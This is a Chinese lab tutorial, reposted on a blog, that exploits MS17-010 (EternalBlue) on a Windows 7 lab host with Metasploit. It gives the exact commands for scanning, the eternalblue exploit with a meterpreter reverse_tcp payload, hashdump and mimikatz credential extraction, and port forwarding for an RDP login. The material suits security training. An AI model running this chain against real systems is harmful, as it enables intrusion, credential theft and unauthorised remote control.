mestasploit笔记 :MS17-010

最新推荐文章于 2023-10-25 22:43:25 发布
最新推荐文章于 2023-10-25 22:43:25 发布
阅读量208 收藏 2
点赞数 1
文章标签: shell
原文链接:http://www.cnblogs.com/diligenceday/p/11008447.html
版权
实验环境

  • 操作机 :Kali 2017

  • 操作机IP:172.16.11.2

  • 目标机:Windows 7

  • 目标机IP:172.16.12.2

实验目的

  • 认知Windows远程溢出漏洞的危害

  • 知悉MS17-010漏洞的发现和验证过程

  • 学习Metasploit工具的进阶使用

实验工具

Nmap:端口扫描探测工具,用于探测端口开放情况,本次使用其端口扫描和漏洞扫描功能

mestasploit:开源的渗透测试框架软件、综合型漏洞利用工具,本次实验使用其漏洞利用模块、meterpreter组件

实验内容

漏洞原理简述

MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。

函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小,因计算大小错误,而导致缓冲区溢出。

实验步骤

曾经NSA工具箱泄露时,我们已经对永恒之蓝这个工具的使用做过讲解!【NSA黑客工具包】Windows 0day验证实验

然而,该工具的使用环境比较苛刻,而且操作较为复杂,现在msf已经加入该系列工具,使用方法更便捷。接下来,就开始操作吧!

第1步 端口探测

打开Kali终端,使用Nmap对目标机开放端口进行扫描

nmap  -sV -Pn 172.16.12.2

目标机开放了135 139 445 3389等端口,且目标机系统为Windows7,

第2步 漏洞扫描

我们使用用扫描模块,判断该漏洞是否可利用

还记得ms08-067的nmap扫描脚本吗?MSF也有扫描模块~

终端内输入

msfconsole

打开 metasploite 命令行客户端,使用search命令查找ms17-010漏洞的相关模块

search ms17-010

 

如下是相关可用模块

search

使用use命令选择我们要使用的扫描模块

use auxiliary/scanner/smb/smb_ms17_010

 

use

在运行该模块之前,需要设置相关选项,我们使用show options查看配置信息

RHOSTS

需要设置目标地址,设置命令:

set RHOSTS 172.16.12.2

 

设置完成后,执行runexploit命令,等待执行结果

run

第3步:漏洞利用

从上一步骤可以看出,该漏洞是可被利用的,接下来,我们祭出漏洞利用模块

use exploit/windows/smb/ms17_010_eternalblue

 

useexp

步骤同上,查看配置信息,并设置标记为yes的属性

show options

目标机host地址:172.16.12.2

set RHOST 172.16.12.2

 

RHOST

注意此处为RHOST,与扫描时的RHOSTS不一样

之后,选择载荷payload,也就是shellcode,此处我们选择回连至控制端shellpayload

set payload  windows/x64/meterpreter/reverse_tcp

 

同样,载荷也需要进行配置,show options查看配置信息

LHOST

配置中缺少本地主机 RHOST,设置一下

set LHOST 172.16.11.2

 

本地端口LPORT默认为4444,可通过set LPORT 端口号修改

完成配置后,运行exploit或者run,开始执行漏洞利用模块

run

成功获取来自目标主机的Session会话

第4步:远程登录目标机

我们已经成功的获取Session会话了,本次我们继续介绍meterpreter后渗透模块的其他功能

运行sysinfo查看目标机器相关信息

systeminfo

执行help命令可以帮助我们了解meterpreter有哪些功能

help

接下来,我们获取目标机hash值

执行hashdump

hashdump

mimikatz是一个知名的密码提取神器。它支持从Windows系统内存中提取明文密码、哈希、PIN码和Kerberos凭证等,meterpreter中正集成了这款工具。

执行load mimikatz即可加载该工具,其命令与mimikatz一样

运行命令msv,导出hash

msv

然后执行kerberos即可获得目标机账号密码

kerberos

获取了目标机的账号密码,我们结合nmap的扫描结果,可以远程登陆目标机 但是现实中,防火墙一般会拦截外来3389端口的访问请求,这种情况下该怎么解决呢?

我们可以使用端口转发工具,将端口转发到访问者本地机器的某个端口,从而进行连接

运行命令

portfwd add -l 3389 -L 127.0.0.1 -p 3389 -r 172.16.12.2

 

portfwd

此处,我们将远程目标的3389端口,转发到本机 172.16.11.2的3389上

本地端口号可设置为其他未监听的端口

如此,我们只要执行

rdesktop  127.0.0.1 -u ichunqiu  -p ichunqiu

 

rdesktop

即可登陆远程目标机器

3389

实验结果分析与总结

通过本次实验,我们熟悉了从发现漏洞、到验证漏洞、再到利用漏洞这一过程,并进一步学习了Metasploit的后渗透模块的其他使用案例。

转载于:https://www.cnblogs.com/diligenceday/p/11008447.html

dianyan5615
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MS17-010永恒之蓝漏洞原理及复现(学习中,未完善)
chenbx163的博客
08-02 198
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。设置被攻击IP地址后,并执行,然后找到蓝屏命令use0(其他电脑不一定,根据英文选择)并使用。一、什么是永恒之蓝?
详解新手如何利用ms17-010配合mimikatz获取目标主机账户密码
1匹黑马
06-09 1929
第一步:使用Nmap扫描目标主机开放端口 要知道ms17010是对445端口进行攻击的,所以我们要先对目标机进行端口扫描 nmap 192.168.48.110 第二步:获取权限 在这里我们利用ms17010(永恒之蓝)漏洞来获取靶机的权限。 运行msf,使用ms17010漏洞。 msf5 > use exploit/windows/smb/ms17_010_eternalblue ...
最受欢迎的20款黑客工具
leah126的博客
05-15 5034
今天,统计了全球各大网站数据(浏览量、下载量、使用量等等),为大家总结出了2019年最受欢迎的 20 款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等。取前 20 款列出,排名不分先后!
termux安装fscan
qq_33008305的博客
11-23 7256
fscan护网、打内网等都会用到的一个小体量的扫描器,go写的,体量小,效率高。当然还有其他的工具,比如K8gege的LadonGo。 为什么要在手机上用fscan呢,便携呗,走到哪连个Wi-Fi就能进行内网探测了。感觉有点类似于前几年提交的移动渗透平台,想起弄这个的时候压根儿没往那方面想,不过也能算到那上面吧。 至于为什么要用fscan,而不是选择kali等,当然kali也能安啊。不过就喜欢这个小体量,速度快。连Wi-Fi内网探测?当然不是家庭的了撒(家...
MS17-010(永恒之蓝)漏洞分析与复现
热门推荐
未完成的歌~的博客
03-12 6万+
文章目录一、漏洞简介1、永恒之蓝介绍:2、漏洞原理:3、影响版本:二、漏洞复现复现环境:复现过程:1、主机发现:2、使用MSF的永恒之蓝漏洞模块3、使用ms17-010扫描模块,对靶机进行扫描:4、使用ms17-010攻击模块,对靶机进行攻击5、得到靶机shell6、通过shell对靶机进行控制 一、漏洞简介 1、永恒之蓝介绍: 永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露
永恒之蓝漏洞 ms17_010 详解
qq_45953122的博客
10-25 5568
永恒之蓝(ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
配套学习资料:Java开发 - 尚硅谷JavaWeb学习笔记
最新发布
06-22
学习笔记请看我写的文章: Java开发 - 尚硅谷JavaWeb学习笔记 - Part1: https://blog.csdn.net/qq_63317769/article/details/139883728 Java开发 - 尚硅谷JavaWeb学习笔记 - Part2: Java开发 - 尚硅谷JavaWeb...
notes::eyes:笔记---用于备忘
04-02
笔记学习过程中的相关总结和笔记此Notes用于备忘。如果出现错误,欢迎指正。谢谢Linux行动Docker和KubernetesAnsible网络MySQL | NoSQLPythonDjango的数据结构吉特哦,我的生活
社交笔记:社交笔记-笔记,共享,时间和位置提醒
02-05
笔记和共享,时间和位置提醒Android应用程序。 应用编辑器 创建笔记 音符提醒 帖子 评论 该应用程序是使用Google Firebase技术,AAC,Android JetPack,Koin,RxJava和RxAndroid以及一组具有MVVM设计模式的第三方...
《Android 群英传》读书笔记:自定义 View ---- 音频条形图
11-26
《Android 群英传》读书笔记:自定义 View ---- 音频条形图 博客地址:http://blog.csdn.net/like_program/article/details/53352899
【保姆式笔记:集成电路-ESD基础知识汇总-从原理到器件、电路和工艺一文总结讲透】
04-04
保姆式笔记:集成电路-ESD基础知识汇总——从原理到器件、电路和工艺一文总结讲透。
网安学习日记-永恒之蓝MS17-010远程溢出漏洞学习(CVE-2017-0143)
末班车的博客
03-10 1202
MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小,因计算大小错误,而导致缓冲区溢出。
MS17-010(Eternal blue永恒之蓝)木马持久化+后渗透+修复
m0_73135216的博客
09-12 667
MS17-010(Eternal blue永恒之蓝)木马持久化+后渗透+修复
ms17-010永恒之蓝漏洞利用,渗透同一局域网下的windows7
m0_63533079的博客
03-08 1837
利用window7存在的ms17-010漏洞进行复现演示
Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现
Zichel77的博客
10-06 2481
发现445端口打开,SMB漏洞MS17-010(永恒之蓝)正是基于445端口进行传播,因此可以加以利用。这里有各种MS17-010漏洞版本,我们根据目标系统选择编号为3的版本。Windows下IP地址为192.168.92.136。就可以看到windows7电脑中新建了这么个文件。看到WIN才说明利用成功,FAIL就是失败。使用的是nmap模块,输入命令进行扫描。开启了两台虚拟机,保证在同一网段下。两台虚拟机在同一网段,故可保持通信。我没这个病毒就不传了哈哈哈哈哈。
渗透测试:metasploit+ms-17-010+Windows2008r2
小梁的博客
09-01 2343
渗透测试:metasploit+ms-17-010+Windows2008r2 工具 1 vbox 2 kali 3 win2008r2 最终效果 创建一个属于Administrators组的用户admin,并使用admin账户进入系统。 实现步骤 1 使用netdiscover 探测局域网内的主机,目的是发现需要渗透的主机 现在我们发现了3台主机。 2 使用nmap进行扫描 nmap基本功能...
【漏洞复现】永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)
做自己喜欢的事,并将其发挥到极致!
03-07 8087
文章目录声明前言一、漏洞原理简述二、漏洞代码深层解析三、实验步骤四、漏洞补丁总结 声明 本篇文章仅用于技术研究与技术学习,切勿用于非授权下攻击行为,切记! 前言 Windows7 存在 MS17-010 永恒之蓝(远程溢出漏洞) ,该漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码 一、漏洞原理简述 MS17-010漏洞出现在Windows SMB v1中的内核态函数 srv!SrvOs2FeaListToNt 在处理FEA(File Ex
网安学习笔记 1 ---- ms17-010 的复现
09-10
网安学习笔记中提到了复现ms17-010漏洞的方法。具体步骤如下: 1. 首先,需要获取目标服务器的IP地址和端口号。可以使用arp命令查看目标服务器的arp表来获取IP地址,如"arp -a"命令。 2. 下一步是获取目标服务器的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值